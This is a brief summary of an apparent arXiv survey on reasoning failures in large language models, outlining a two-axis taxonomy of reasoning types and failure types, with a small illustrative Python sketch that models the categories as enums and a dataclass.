Large Language Model Reasoning Failures

Large Language Models (LLMs) have exhibited remarkable reasoning capabilities, achieving impressive results across a wide range of tasks. Despite these advances, significant reasoning failures persist, occurring even in seemingly simple scenarios. To systematically understand and address these shortcomings, the authors of the paper present the first comprehensive survey dedicated to reasoning failures in LLMs.

The authors introduce a novel categorization framework that divides reasoning into embodied and non-embodied types, with the latter further subdivided into informal (intuitive) and formal (logical) reasoning. In parallel, they classify reasoning failures along a complementary axis into three types: fundamental failures intrinsic to LLM architectures that broadly affect downstream tasks; application-specific limitations that manifest in particular domains; and robustness issues characterized by inconsistent performance across minor variations. For each reasoning failure, they provide a clear definition, analyze existing studies, explore root causes, and present mitigation strategies.
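One way to picture the two-axis framework is as a small data structure. The sketch below is illustrative only and is not taken from the paper: the class names, field names, and the `taxonomy_cells` helper are assumptions introduced here, and the sample entry is a hypothetical placeholder rather than a failure the survey assigns to that cell.

```python
from dataclasses import dataclass
from enum import Enum


class ReasoningType(Enum):
    """First axis: the kind of reasoning involved (names are assumptions)."""
    EMBODIED = "embodied"
    INFORMAL = "non-embodied, informal (intuitive)"
    FORMAL = "non-embodied, formal (logical)"


class FailureType(Enum):
    """Second axis: the kind of failure (names are assumptions)."""
    FUNDAMENTAL = "intrinsic to LLM architectures"
    APPLICATION_SPECIFIC = "manifests in particular domains"
    ROBUSTNESS = "inconsistent performance across minor variations"


@dataclass(frozen=True)
class FailureEntry:
    """One catalogued failure, placed on both axes (hypothetical record type)."""
    name: str
    reasoning: ReasoningType
    failure: FailureType


def taxonomy_cells():
    """Enumerate every (reasoning type, failure type) combination."""
    return [(r, f) for r in ReasoningType for f in FailureType]


# Hypothetical placeholder entry, used only to show how a failure would be filed.
example = FailureEntry(
    name="placeholder failure",
    reasoning=ReasoningType.FORMAL,
    failure=FailureType.ROBUSTNESS,
)
```

Treating the two axes as independent enumerations mirrors the summary's description of the failure types as a "complementary axis": any failure can be filed under one reasoning type and one failure type.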

Source: ARXIV, Cornell University
